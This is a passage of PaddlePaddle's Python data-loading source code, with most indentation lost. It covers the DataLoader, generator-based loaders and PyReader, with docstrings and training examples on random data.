            putting data into the inter-process queue. Set :attr:`use_shared_memory`
            to True only when the shared memory space on your machine (e.g.
            the space of '/dev/shm' on a Linux operating system) is large enough.
            Shared memory will only be enabled in multi-process mode (num_workers
            > 0). Default True.
        timeout(int): the timeout value for getting data from the output queue
            of subprocesses. Default 0.
        worker_init_fn(callable): init function which will be called with the
            worker id when each subprocess starts, if not set as None. Default
            None.
    Returns:
        DataLoader: an iterable object for data iterating; each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
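    .. note::
        A hypothetical sketch (not from the original documentation) of the
        "automatic batching disabled" case described above, where the dataset
        itself yields whole batches because both :attr:`batch_size` and
        :attr:`batch_sampler` are None:
        .. code-block:: python
            # assumes paddle, numpy as np, and DataLoader imported as above
            class PrebatchedDataset(paddle.io.IterableDataset):
                def __iter__(self):
                    for _ in range(10):
                        yield np.random.random([16, 784]).astype('float32')
            loader = DataLoader(PrebatchedDataset(),
                                batch_size=None,
                                num_workers=0)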
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.auto_collate_batch = self.batch_sampler is not None
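        # NOTE (descriptive summary of the logic below): pin memory only takes
        # effect in dygraph mode; the global use_pinned_memory() setting, if it
        # has been set, overrides the default of True.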
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
        If iterable = True, the created DataLoader object is a Python generator
        object, which can be iterated over using a for loop.
        If iterable = False, the created DataLoader object provides
        :code:`start()` and :code:`reset()` methods to control the data reading
        process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
            use_double_buffer (bool): whether to use double_buffer_reader.
                If use_double_buffer=True, the DataLoader would prefetch the next
                batch asynchronously, which speeds up data feeding and occupies
                a little more CPU or GPU memory, i.e., the memory of one batch
                of input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
                the name of each fed Tensor. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
                    cross_entropy = F.softmax_with_cross_entropy(fc_tmp, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
        Dataset is currently only supported on Linux systems.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
    The GeneratorLoader for dygraph mode.
    Most functions of the multiprocess dygraph GeneratorLoader differ from the
    static graph GeneratorLoader, so it is implemented separately to keep the code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
            # with SIGSEGV and SIGBUS of the child process; 2. if the main process ends before the
            # child process, it shuts all its daemonic children down with a SIGTERM (instead of
            # joining them without a timeout), so here we also need to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
                # NOTE: [ avoid failing quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
                # is relatively long, currently 60 seconds, because in some models,
                # if the reader child process starts with a heavy burden, the child process
                # does not have enough time to put the data into the queue before the main
                # process starts trying to get data from the queue. At this time, the child
                # thread needs to wait slightly longer.
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
                # NOTE: [ avoid hanging ] After adding the shared memory mechanism, not only
                # the queue.Empty exception but also other exceptions, such as mmap failure,
                # can occur here. If they are not handled here, the loader will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
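            # Descriptive note: the loop below transposes a list of samples into
            # per-field slots, e.g. [(img0, lbl0), (img1, lbl1)] ->
            # [[img0, img1], [lbl0, lbl1]], so each slot can later be turned into
            # a batched tensor (illustrative names).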
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
        # would set self._thread to None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
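        # Descriptive sketch of what this method builds (summary of the code
        # below): a LoDTensorBlockingQueue variable, a create_py_reader op
        # (optionally wrapped in a double_buffer reader) and a 'read' op that
        # feeds self._feed_list in the main program.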
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
                    'places would be omitted when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
        use_double_buffer (bool): whether to use double_buffer_reader.
            If use_double_buffer=True, PyReader would prefetch the next
            batch asynchronously, which speeds up data feeding and occupies
            a little more CPU or GPU memory, i.e., the memory of one batch
            of input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
            the name of each fed variable. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
